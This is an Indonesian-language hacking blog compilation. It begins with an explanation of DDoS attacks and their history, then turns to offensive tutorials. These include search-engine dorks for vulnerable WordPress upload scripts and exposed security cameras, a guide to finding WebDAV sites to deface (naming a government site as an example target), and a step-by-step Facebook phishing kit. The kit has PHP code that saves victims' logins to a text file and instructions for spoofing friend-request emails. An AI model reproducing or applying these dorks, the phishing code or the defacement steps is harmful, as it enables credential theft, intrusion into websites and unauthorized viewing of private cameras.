Serangan Denial of Service klasik bersifat "satu lawan satu", sehingga dibutuhkan sebuah host yang kuat (baik itu dari kekuatan pemrosesan atau sistem operasinya) demi membanjiri lalu lintas host target sehingga mencegah klien yang valid untuk mengakses layanan jaringan pada server yang dijadikan target serangan. Serangan DDoS ini menggunakan teknik yang lebih canggih dibandingkan dengan serangan Denial of Service yang klasik, yakni dengan meningkatkan serangan beberapa kali dengan menggunakan beberapa buah komputer sekaligus, sehingga dapat mengakibatkan server atau keseluruhan segmen jaringan dapat menjadi "tidak berguna sama sekali" bagi klien.
Serangan DDoS pertama kali muncul pada tahun 1999, tiga tahun setelah serangan Denial of Service yang klasik muncul, dengan menggunakan serangan SYN Flooding, yang mengakibatkan beberapa server web di Internet mengalami "downtime". Pada awal Februari 2000, sebuah serangan yang besar dilakukan sehingga beberapa situs web terkenal seperti Amazon, CNN, eBay, dan Yahoo! mengalami "downtime" selama beberapa jam. Serangan yang lebih baru lagi pernah dilancarkan pada bulan Oktober 2002 ketika 9 dari 13 root DNS Server diserang dengan menggunakan DDoS yang sangat besar yang disebut dengan "Ping Flood". Pada puncak serangan, beberapa server tersebut pada tiap detiknya mendapatkan lebih dari 150.000 request paket Internet Control Message Protocol (ICMP). Untungnya, karena serangan hanya dilakukan selama setengah jam saja, lalu lintas Internet pun tidak terlalu terpengaruh dengan serangan tersebut (setidaknya tidak semuanya mengalami kerusakan).
Tidak seperti akibatnya yang menjadi suatu kerumitan yang sangat tinggi (bagi para administrator jaringan dan server yang melakukan perbaikan server akibat dari serangan), teori dan praktik untuk melakukan serangan DDoS justru sederhana, yakni sebagai berikut:
  1. Menjalankan tool (biasanya berupa program (perangkat lunak) kecil) yang secara otomatis akan memindai jaringan untuk menemukan host-host yang rentan (vulnerable) yang terkoneksi ke Internet. Setelah host yang rentan ditemukan, tool tersebut dapat menginstalasikan salah satu jenis dari Trojan Horse yang disebut sebagai DDoS Trojan, yang akan mengakibatkan host tersebut menjadi zombie yang dapat dikontrol secara jarak jauh (bahasa Inggris: remote) oleh sebuah komputer master yang digunakan oleh si penyerang asli untuk melancarkan serangan. Beberapa tool (software} yang digunakan untuk melakukan serangan serperti ini adalah TFN, TFN2K, Trinoo, dan Stacheldraht, yang dapat diunduh secara bebas di Internet.
  2. Ketika si penyerang merasa telah mendapatkan jumlah host yang cukup (sebagai zombie) untuk melakukan penyerangan, penyerang akan menggunakan komputer master untuk memberikan sinyal penyerangan terhadap jaringan target atau host target. Serangan ini umumnya dilakukan dengan menggunakan beberapa bentuk SYN Flood atau skema serangan DoS yang sederhana, tapi karena dilakukan oleh banyak host zombie, maka jumlah lalu lintas jaringan yang diciptakan oleh mereka adalah sangat besar, sehingga "memakan habis" semua sumber daya Transmission Control Protocol yang terdapat di dalam komputer atau jaringan target dan dapat mengakibatkan host atau jaringan tersebut mengalami "downtime".
Hampir semua platform komputer dapat dibajak sebagai sebuah zombie untuk melakukan serangan seperti ini. Sistem-sistem populer, semacam Solaris, Linux, Microsoft Windows dan beberapa varian UNIX dapat menjadi zombie, jika memang sistem tersebut atau aplikasi yang berjalan di atasnya memiliki kelemahan yang dieksploitasi oleh penyerang.
Beberapa contoh Serangan DoS lainnya adalah:

dork WP

[DORK]
inurl:/wp-content/themes/pronto/cjl/pronto/uploadify/check.php
inurl:/wp-content/plugins/1-flash-gallery/upload.php
inurl:/wp-content/themes/zcool-like/uploadify.php
inurl:/third-party/uploadify/uploadify.php
inurl:/lib/uploadify/custom.php
inurl:/wp-content/plugins/html5avmanager/lib/uploadify/custom.php
inurl:/wp-content/plugins/wp-property/third-party/uploadify/uploadify.php
inurl:/wp-content/plugins/squace-mobile-publishing-plugin-for-wordpress/uploadify.php
inurl:/wp-content/plugins/1-flash-gallery/js/uploadify/uploadify.php
inurl:/wp-content/themes/aim-theme/lib/js/old/uploadify.php
inurl:/wp-content/plugins/annonces/includes/lib/uploadify/uploadify.php
inurl:/wp-content/plugins/apptivo-business-site/inc/jobs/files/uploadify/uploadify.php
inurl:/wp-content/plugins/bulletproof-security/admin/uploadify/uploadify.php
inurl:/wp-content/plugins/chillybin-competition/js/uploadify/uploadify.php
inurl:/wp-content/plugins/comments_plugin/uploadify/uploadify.php
inurl:/wp-content/plugins/wp-crm/third-party/uploadify/uploadify.php
inurl:/wp-content/plugins/doptg/libraries/php/uploadify.php
inurl:/wp-content/plugins/pods/js/uploadify.php
inurl:/wp-content/plugins/wp-property/third-party/uploadify/uploadify.php
inurl:/wp-content/plugins/qr-color-code-generator-basic/QR-Color-Code-Generator/uploadify/uploadify.php
inurl:/wp-content/plugins/wp-symposium/uploadify/uploadify.php
inurl:/wp-content/plugins/uploader/uploadify.php
inurl:/wp-content/plugins/uploadify/includes/process_upload.php
inurl:/wp-content/plugins/very-simple-post-images/uploadify/uploadify.php

[Dork]
 ==> inurl:/wp-content/themes/WPstore/Exploit
 [Exploit]
==> /wp-content/themes/WPStore/upload/hasil  
[Hasil]
==> /wp-content/uploads/products_img/namafilekamu

Dork kamera keamanan

*inurl:”CgiStart?page=”
* inurl:/view.shtml
* intitle:”Live View / – AXIS
* inurl:view/view.shtml
* inurl:ViewerFrame?Mode=
* inurl:ViewerFrame?Mode=Refresh
* inurl:axis-cgi/jpg
* inurl:axis-cgi/mjpg (motion-JPEG) (disconnected)
* inurl:view/indexFrame.shtml
* inurl:view/index.shtml
* inurl:view/view.shtml
* liveapplet
* intitle:”live view” intitle:axis
* intitle:liveapplet
* allintitle:”Network Camera NetworkCamera” (disconnected)
* intitle:axis intitle:”video server”
* intitle:liveapplet inurl:LvAppl
* intitle:”EvoCam” inurl:”webcam.html”
* intitle:”Live NetSnap Cam-Server feed”
* intitle:”Live View / – AXIS”
* intitle:”Live View / – AXIS 206M”
* intitle:”Live View / – AXIS 206W”
* intitle:”Live View / – AXIS 210?
* inurl:indexFrame.shtml Axis
* inurl:”MultiCameraFrame?Mode=Motion” (disconnected)
* intitle:start inurl:cgistart
* intitle:”WJ-NT104 Main Page”
* intitle:snc-z20 inurl:home/
* intitle:snc-cs3 inurl:home/
* intitle:snc-rz30 inurl:home/
* intitle:”sony network camera snc-p1?
* intitle:”sony network camera snc-m1?
* site:.viewnetcam.com -www.viewnetcam.com
* intitle:”Toshiba Network Camera” user login
* intitle:”netcam live image” (disconnected)
* intitle:”i-Catcher Console – Web Monitor”

cara mencari web vuln webdav

Bagi Agan agan yang suka nge depes site pake webdav,berikut tutorial untuk mencari site yang vuln terhadap webdav


Dork :
  • intitle:”index.of” intext:”(Win32) DAV/2″ intext:”Apache”
  • intitle:”index.of” intext:”(Win32) DAV/2″ intext:”Apache” site:edu
  • intitle:”index.of” intext:”(Win32) DAV/2″ intext:”Apache” site:gov
  • intitle:”index.of” intext:”(Win32) DAV/2″ intext:”Apache” site:com
  • inurl:webdav
  • inurl:.com.x/*.asp
  • inurl:.edu.x/*.asp
  • inurl:.gov.x/*.asp
  • inurl:.net.x/*.asp
  • inurl:.org.x/*.asp
Ganti tulisan x menjadi domain negara, Contoh :id, us, my, mm, il
Pilih salah satu target site, tambahkan /webdav pada site tersebut. Misal target adalah www.fbi.gov menjadi www.fbi.gov/webdav. Jika muncul halaman yang bertuliskan WebDav Testpage berarti site tersebut kemungkinan 100% berhasil jika kita hack.

Cara membuat phising facebook

opss apa itu phising pising adalah sebuah situs yang meniru fb jadi seolah2 sama 
apabila ada seseorang yang login melalui situs kita tersebut jadi smua paswor dan email fbnya kesimpan di  salah satu text yang sudak kita buat

nahh bagai mana tuhh  buatnya  begini nihh

siapa tau ada yang mau jadi hacker


Phising merupakan istilah yang diambil dari kata Fishing yang artinya Memancing.Phising didunia internet berarti memancing korban untuk mengunjungi halaman tertentu.Phising di Facebook berarti Hacker menggunakan segala cara untuk memancing anda agar mengunjungi halaman Facebook palsu (Fake Login Facebook).Phising Facebook merupakan cara yang paling sering digunakan dalam Facebook Hacking.
Cara Phising-nya antara lain:
1. Mengirim Email palsu
Intinya Hacker mengirim sebuat email kepada anda yang seolah-olah merupakan email dari Facebook dan anda diminta untuk mengunjungi sebuah link/url/alamat situs.
2. Melalui IM(internet messenger)
Misalnya Hacker masuk kesebuah room di YM(Yahoo Messenger) dan mempost sebuah link Facebook Palsu.
3. Melalui sebuah situs
misalnya :
a) Hacker membuat sebuah Blog dan memposting artikel menarik tentang Facebook dan mengarahkan anda ke halaman login Facebook palsu.
b) Dengan memberi komentar beserta link Facebook palsu diartikel sebuah situs
c) Hacker menggunakan situs² iklan baris gratis/non gratis untuk mem-post tulisan ajakan-nya. Dll

Berikut Cara Mudah Membuat Phising Facebook :
1. Buka http://www.facebook.com/login.php
2. Klik Kanan >> View Page Source atau tekan CTRL + U
3. Copy semua kode yang ada disitu kemudian paste ke notepad
4. Tekan CTRL + F kemudian cari kata action=
5..Ubah.action="https://www.facebook.com/login.php?login_attempt=1menjadi action="next.php" .. Ubah juga method dari POST menjadi get

6. Simpan notepad ini dengan nama login.php 
7. Buat notepad baru kemudian isikan kode berikut
<?php header("Location: http://www.Facebook.com/login.php "); $handle = fopen("pass.txt", "a"); foreach($_GET as $variable => $value) { fwrite($handle, $variable); fwrite($handle, "="); fwrite($handle, $value); fwrite($handle, "\r\n"); } fwrite($handle, "\r\n"); fclose($handle); exit; ?>

Note: ubah http://www.Facebook.com/login.php menjadi alamat web yang anda inginkan

8. Simpan Dengan Nama next.php
9. Buat notepad baru lagi .. isikan dengan huruf L >> Kemudian simpan dengan nama pass.txt
10. Kemudian Upload ke tiga file tersebut "login.php, next.php, pass.txt" ke alamat free hosting misalnya  http://000webhost.com,http://idhostinger.com, http://spam.com atau 1freehostinger.
Langkah-langkah spoofing :
1. Copy content asli undangan pertemanan dari facebook.
2. Edit hyperlink dari : "http:/www.facebook.com/n/?reqs.php"
3. Ganti dengan halaman phising anda, hal ini tidak akan merubah tampilan di content asli facebook tapi tetap mengarah ke halaman phising kamu. Phising siap dikirim ke korban kamu.